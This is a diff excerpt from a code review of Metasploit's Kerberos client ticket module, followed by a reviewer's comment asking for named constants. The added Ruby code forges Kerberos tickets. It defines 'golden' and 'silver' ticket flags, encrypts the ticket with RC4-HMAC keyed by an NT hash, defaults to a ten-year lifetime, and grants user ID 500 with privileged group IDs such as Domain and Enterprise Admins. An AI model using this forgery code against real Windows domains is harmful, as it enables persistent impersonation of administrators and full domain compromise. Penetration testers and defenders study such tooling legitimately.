lib/msf/core/exploit/remote/kerberos/client/ticket.rb

```diff
@@ -0,0 +1,150 @@
+                sname: principal,
+                enc_part: enc_part
+              )
+            end
+
+            def create_enc_ticket_part(key:, domain:, opts: {})
+              ticket_enc_part = Rex::Proto::Kerberos::Model::TicketEncPart.new
+
+              ticket_enc_part.key = Rex::Proto::Kerberos::Model::EncryptionKey.new(
+                type: Rex::Proto::Kerberos::Crypto::Encryption::RC4_HMAC, value: key
+              )
+              ticket_enc_part.flags = opts[:flags]
+              ticket_enc_part.crealm = domain.upcase
+              ticket_enc_part.cname = opts[:client]
+              ticket_enc_part.transited = Rex::Proto::Kerberos::Model::TransitedEncoding.new(tr_type: 0, contents: '')
+              ticket_enc_part.authtime = opts[:auth_time]
+              ticket_enc_part.starttime = opts[:start_time]
+              ticket_enc_part.endtime = opts[:end_time]
+              ticket_enc_part.renew_till = opts[:renew_till]
+              ticket_enc_part.authorization_data = build_pac_authorization_data(opts)
+              ticket_enc_part
+            end
+
+            def encrypt_ticket_enc_part(ticket_enc_part:, key:)
+              encrypted = Rex::Proto::Kerberos::Crypto::Rc4Hmac.new.encrypt(
+                ticket_enc_part.encode, key, Rex::Proto::Kerberos::Crypto::KeyUsage::KDC_REP_TICKET
+              )
+
+              Rex::Proto::Kerberos::Model::EncryptedData.new(
+                etype: Rex::Proto::Kerberos::Crypto::Encryption::RC4_HMAC, kvno: 2, cipher: encrypted
+              )
+            end
+
+            def silver_ticket_flags
+              [
+                Rex::Proto::Kerberos::Model::TicketFlag::FORWARDABLE,
+                Rex::Proto::Kerberos::Model::TicketFlag::PROXIABLE,
+                Rex::Proto::Kerberos::Model::TicketFlag::RENEWABLE,
+                Rex::Proto::Kerberos::Model::TicketFlag::PRE_AUTHENT
+              ]
+            end
+
+            def golden_ticket_flags
+              silver_ticket_flags << Rex::Proto::Kerberos::Model::TicketFlag::INITIAL
+            end
+
+            private
+
+            def generate_ccache(domain, domain_sid, flags, nt_hash, sname, username, duration_in_days=3650)
+              sname_principal = create_principal(sname)
+              cname_principal = create_principal(username)
+              enc_key = [nt_hash].pack('H*')
+              current_time = Time.now
+              expiry_date = current_time + SECS_IN_DAY * duration_in_days
+              opts = {
+                client: cname_principal,
+                server: sname_principal,
+                flags: flags,
+                auth_time: current_time,
+                start_time: current_time,
+                end_time: expiry_date,
+                renew_till: expiry_date,
+                realm: domain.upcase,
+                key_value: enc_key,
+                enc_key: enc_key,
+                user_id: 500,
+                group_ids: [513, 512, 520, 518, 519],
```

Comment:
Can we swap this out for constants 👀 

I think we use the same constants in the kerberos chksum exploit as well